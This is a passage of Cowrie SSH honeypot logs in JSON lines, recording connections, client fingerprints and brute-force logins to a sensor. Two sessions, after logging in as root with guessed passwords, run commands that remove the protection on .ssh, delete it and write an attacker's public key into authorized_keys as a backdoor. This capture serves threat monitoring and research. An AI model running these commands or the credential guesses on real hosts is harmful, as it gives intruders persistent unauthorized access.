{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:50:46.346526Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.login.success","username":"root","password":"loulou","message":"login attempt [root/loulou] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:50:47.051154Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:50:47.462765Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:50:47.463434Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:50:47.464276Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:47.820914Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:50:48.058607Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:50:48.059389Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:50:48.237296Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:48.238160Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41558,"dst_ip":"1.2.3.4","dst_port":22,"session":"b44861ff8274","protocol":"ssh","message":"New connection: 212.227.235.229:41558 (1.2.3.4:22) [session: b44861ff8274]","sensor":"my-vps","timestamp":"2025-09-09T05:50:48.421850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:50:48.432033Z","src_ip":"212.227.235.229","session":"b44861ff8274"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:50:48.614287Z","src_ip":"212.227.235.229","session":"b44861ff8274"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:50:49.352803Z","src_ip":"212.227.235.229","session":"b44861ff8274"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.539754Z","src_ip":"212.227.235.229","session":"b44861ff8274"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":39262,"dst_ip":"1.2.3.4","dst_port":22,"session":"558e58f326dc","protocol":"ssh","message":"New connection: 139.19.117.131:39262 (1.2.3.4:22) [session: 558e58f326dc]","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.565231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.565843Z","src_ip":"139.19.117.131","session":"558e58f326dc"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.582578Z","src_ip":"139.19.117.131","session":"558e58f326dc"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.617554Z","src_ip":"139.19.117.131","session":"558e58f326dc"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.618959Z","src_ip":"139.19.117.131","session":"558e58f326dc"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.636288Z","src_ip":"139.19.117.131","session":"558e58f326dc"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.637102Z","src_ip":"139.19.117.131","session":"558e58f326dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42158,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aaa4cfe129c","protocol":"ssh","message":"New connection: 212.227.235.229:42158 (1.2.3.4:22) [session: 4aaa4cfe129c]","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.717922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.722194Z","src_ip":"212.227.235.229","session":"4aaa4cfe129c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:50:50.900705Z","src_ip":"212.227.235.229","session":"4aaa4cfe129c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:50:51.629667Z","src_ip":"212.227.235.229","session":"4aaa4cfe129c"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:51.809912Z","src_ip":"212.227.235.229","session":"9b2bde1d5eea"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:50:51.811923Z","src_ip":"212.227.235.229","session":"4aaa4cfe129c"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:00.565462Z","src_ip":"139.19.117.131","session":"558e58f326dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60414,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ac7d81a9ffa","protocol":"ssh","message":"New connection: 212.227.235.229:60414 (1.2.3.4:22) [session: 9ac7d81a9ffa]","sensor":"my-vps","timestamp":"2025-09-09T05:51:02.552167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:51:02.552972Z","src_ip":"212.227.235.229","session":"9ac7d81a9ffa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:51:02.795798Z","src_ip":"212.227.235.229","session":"9ac7d81a9ffa"}
{"eventid":"cowrie.session.closed","duration":31.049811363220215,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:12.460511Z","src_ip":"45.71.127.215","session":"da52bf8accf8"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":44738,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c7cc0efa15f","protocol":"ssh","message":"New connection: 213.6.203.226:44738 (1.2.3.4:22) [session: 6c7cc0efa15f]","sensor":"my-vps","timestamp":"2025-09-09T05:51:13.395522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:51:13.396884Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:51:13.464483Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.login.success","username":"root","password":"cooldude","message":"login attempt [root/cooldude] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:51:13.779396Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:51:13.935109Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:51:13.935784Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:51:13.936921Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.005862Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:51:14.244559Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:51:14.245238Z","src_ip":"213.6.203.226","session":"6c7cc0efa15f"}
